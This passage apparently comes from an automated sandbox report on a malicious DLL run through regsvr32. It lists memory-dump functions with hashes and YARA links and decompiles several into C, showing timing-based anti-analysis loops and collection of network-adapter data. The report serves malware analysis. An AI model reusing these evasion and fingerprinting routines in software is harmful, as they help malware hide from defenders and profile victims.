                                                                                                                                                                                                • API ID: InformationQuerySystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3562636166-0
                                                                                                                                                                                                • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                • Instruction ID: 70d111912c2cbac548599712bfbfc28bbb731f3bcc3c157566cbc322c2b42382
                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E218E75317B4083EB468BA2A848369A6B2FB89BC1F888034DE4E87765EF3CC445D700
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 020D2434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                			E020D2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E020D11FC(_t73 - 0x29, _t52);
					_t37 = E020D153C(_t73 - 0x29);
					E020D2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E020D1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E020D272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E020D1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E020D2A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                0x020d2434
                                                                                                                                                                                                0x020d2434
                                                                                                                                                                                                0x020d2434
                                                                                                                                                                                                0x020d2434
                                                                                                                                                                                                0x020d2434
                                                                                                                                                                                                0x020d2434
                                                                                                                                                                                                0x020d2434
                                                                                                                                                                                                0x020d2439
                                                                                                                                                                                                0x020d243f
                                                                                                                                                                                                0x020d244d
                                                                                                                                                                                                0x020d244d
                                                                                                                                                                                                0x020d244d
                                                                                                                                                                                                0x020d2512
                                                                                                                                                                                                0x020d2528
                                                                                                                                                                                                0x020d2450
                                                                                                                                                                                                0x020d2454
                                                                                                                                                                                                0x020d2456
                                                                                                                                                                                                0x020d245a
                                                                                                                                                                                                0x020d2460
                                                                                                                                                                                                0x020d2468
                                                                                                                                                                                                0x020d246e
                                                                                                                                                                                                0x020d2472
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x020d2474
                                                                                                                                                                                                0x020d2482
                                                                                                                                                                                                0x020d248c
                                                                                                                                                                                                0x020d249d
                                                                                                                                                                                                0x020d249f
                                                                                                                                                                                                0x020d24a4
                                                                                                                                                                                                0x020d24a7
                                                                                                                                                                                                0x020d24b0
                                                                                                                                                                                                0x020d24bf
                                                                                                                                                                                                0x020d24c1
                                                                                                                                                                                                0x020d24cc
                                                                                                                                                                                                0x020d24d2
                                                                                                                                                                                                0x020d24d7
                                                                                                                                                                                                0x020d24db
                                                                                                                                                                                                0x020d24e0
                                                                                                                                                                                                0x020d24e2
                                                                                                                                                                                                0x020d24f0
                                                                                                                                                                                                0x020d24f0
                                                                                                                                                                                                0x020d24fc
                                                                                                                                                                                                0x020d2501
                                                                                                                                                                                                0x020d2504
                                                                                                                                                                                                0x020d250d
                                                                                                                                                                                                0x020d250d
                                                                                                                                                                                                0x020d2504
                                                                                                                                                                                                0x020d24cc
                                                                                                                                                                                                0x020d24bf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x020d24a7

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                • Instruction ID: be7b732fc3a115ffd807d36193623f179b27bc350e9b0e5b024a61a3e29278cf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6221AF36302B409AEB21DFB1E8543DD73A2EB48788F884426DE4D5761DEF38D509E750
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2103897566.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000003.00000002.2103883694.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103910607.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103919598.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103936331.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                • API String ID: 4275171209-1517691801
                                                                                                                                                                                                • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2103897566.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000003.00000002.2103883694.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103910607.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103919598.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103936331.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                • API String ID: 1174013218-1650116920
                                                                                                                                                                                                • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2103897566.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000003.00000002.2103883694.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103910607.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103919598.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103936331.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                • API String ID: 4275171209-2766056989
                                                                                                                                                                                                • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                • Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
                                                                                                                                                                                                • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 020D10AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExitProcessSleepUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 354099737-0
                                                                                                                                                                                                • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                • Instruction ID: 7758b1e00b98d4ef161ee4fc311c2509fd9f910f85d46a146a10d09b02f20ad1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                • Instruction Fuzzy Hash: B5C08C3010B380C2F35E77A4EA4C3286E74A70030AFC00619C20B056E18F7C10C8C343
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2103897566.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000003.00000002.2103883694.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103910607.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103919598.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103936331.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                • Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
                                                                                                                                                                                                • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 020D260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,020D1E13), ref: 020D264B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                • Instruction ID: a771bfe5bcb7f0f355d5c476843d68b3b5b300106b84b1473139d3445ba5cc92
                                                                                                                                                                                                • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                • Instruction Fuzzy Hash: ADE09222722741C2DF25EB60E8583997761FB84704FC44122898E026B0EF3CC65DCB00
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 020D1000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                • Instruction ID: f34faaf9f5696e17acdf1bfbe6a02fdbb29f84c075d8f372a7a577ecd4937b1f
                                                                                                                                                                                                • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                • Instruction Fuzzy Hash: EDD0A972F1138083E730AB60EA1A39A6B61F394319FC08206C98E44968CF7CC158CA04
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2103897566.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000003.00000002.2103883694.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103910607.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103919598.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103936331.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %
                                                                                                                                                                                                • API String ID: 0-2567322570
                                                                                                                                                                                                • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2103897566.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000003.00000002.2103883694.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103910607.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103919598.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000003.00000002.2103936331.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 020D1E50, Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                			E020D1E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}















                                                                                                                                                                                                0x020d1e50
                                                                                                                                                                                                0x020d1e50
                                                                                                                                                                                                0x020d1e50
                                                                                                                                                                                                0x020d1e50
                                                                                                                                                                                                0x020d1e55
                                                                                                                                                                                                0x020d1e5a
                                                                                                                                                                                                0x020d1e5f
                                                                                                                                                                                                0x020d1e60
                                                                                                                                                                                                0x020d1e6b
                                                                                                                                                                                                0x020d1e6b
                                                                                                                                                                                                0x020d1e71
                                                                                                                                                                                                0x020d1e73
                                                                                                                                                                                                0x020d1e84
                                                                                                                                                                                                0x020d1e86
                                                                                                                                                                                                0x020d1e8a
                                                                                                                                                                                                0x020d1e8e
                                                                                                                                                                                                0x020d1e92
                                                                                                                                                                                                0x020d1e96
                                                                                                                                                                                                0x020d1e98
                                                                                                                                                                                                0x020d1e9f
                                                                                                                                                                                                0x020d1ea2
                                                                                                                                                                                                0x020d1ea5
                                                                                                                                                                                                0x020d1eab
                                                                                                                                                                                                0x020d1ead
                                                                                                                                                                                                0x020d1eb8
                                                                                                                                                                                                0x020d1eba
                                                                                                                                                                                                0x020d1ec1
                                                                                                                                                                                                0x020d1ec4
                                                                                                                                                                                                0x020d1ec7
                                                                                                                                                                                                0x020d1ec7
                                                                                                                                                                                                0x020d1ee9

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                • Instruction ID: 54e357ad3f8772848de1f0ff237057ef140ba6ad7e7096bbbce8b69e0aa92b0d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C01D472B24B908BDF648F76B604349BAA2F38D7C0F148535EB9C43B19DA3CD0958B04
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 1920 Parent PID: 1296 regsvr32.exeCOMMON

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 001327BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                			E001327BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E00132990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x1370c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E00132990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                0x001327bc
                                                                                                                                                                                                0x001327bc
                                                                                                                                                                                                0x001327bc
                                                                                                                                                                                                0x001327bf
                                                                                                                                                                                                0x001327c3
                                                                                                                                                                                                0x001327c7
                                                                                                                                                                                                0x001327cb
                                                                                                                                                                                                0x001327d4
                                                                                                                                                                                                0x001327d7
                                                                                                                                                                                                0x001327e7
                                                                                                                                                                                                0x001327ea
                                                                                                                                                                                                0x001327fa
                                                                                                                                                                                                0x00132800
                                                                                                                                                                                                0x00132806
                                                                                                                                                                                                0x0013285f
                                                                                                                                                                                                0x0013285f
                                                                                                                                                                                                0x00132876
                                                                                                                                                                                                0x0013287b
                                                                                                                                                                                                0x00132893
                                                                                                                                                                                                0x00132893
                                                                                                                                                                                                0x0013280f
                                                                                                                                                                                                0x00132814
                                                                                                                                                                                                0x0013281f
                                                                                                                                                                                                0x0013282c
                                                                                                                                                                                                0x0013282c
                                                                                                                                                                                                0x0013282f
                                                                                                                                                                                                0x00132835
                                                                                                                                                                                                0x0013283b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00132842
                                                                                                                                                                                                0x00132845
                                                                                                                                                                                                0x00132849
                                                                                                                                                                                                0x00132894
                                                                                                                                                                                                0x00132897
                                                                                                                                                                                                0x0013289e
                                                                                                                                                                                                0x001328a9
                                                                                                                                                                                                0x001328b5
                                                                                                                                                                                                0x001328b7
                                                                                                                                                                                                0x001328ba
                                                                                                                                                                                                0x001328c1
                                                                                                                                                                                                0x001328c8
                                                                                                                                                                                                0x001328cd
                                                                                                                                                                                                0x001328d0
                                                                                                                                                                                                0x001328d0
                                                                                                                                                                                                0x001328b5
                                                                                                                                                                                                0x001328d7
                                                                                                                                                                                                0x001328da
                                                                                                                                                                                                0x001328df
                                                                                                                                                                                                0x001328e8
                                                                                                                                                                                                0x001328ed
                                                                                                                                                                                                0x001328f6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x001328fc
                                                                                                                                                                                                0x0013284b
                                                                                                                                                                                                0x00132854
                                                                                                                                                                                                0x00132859
                                                                                                                                                                                                0x00132859

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00132CFE,?,?,00000003,001324A4), ref: 0013280F
                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00132CFE,?,?,00000003,001324A4), ref: 00132845
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2109607130.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AdaptersInfo
                                                                                                                                                                                                • String ID:
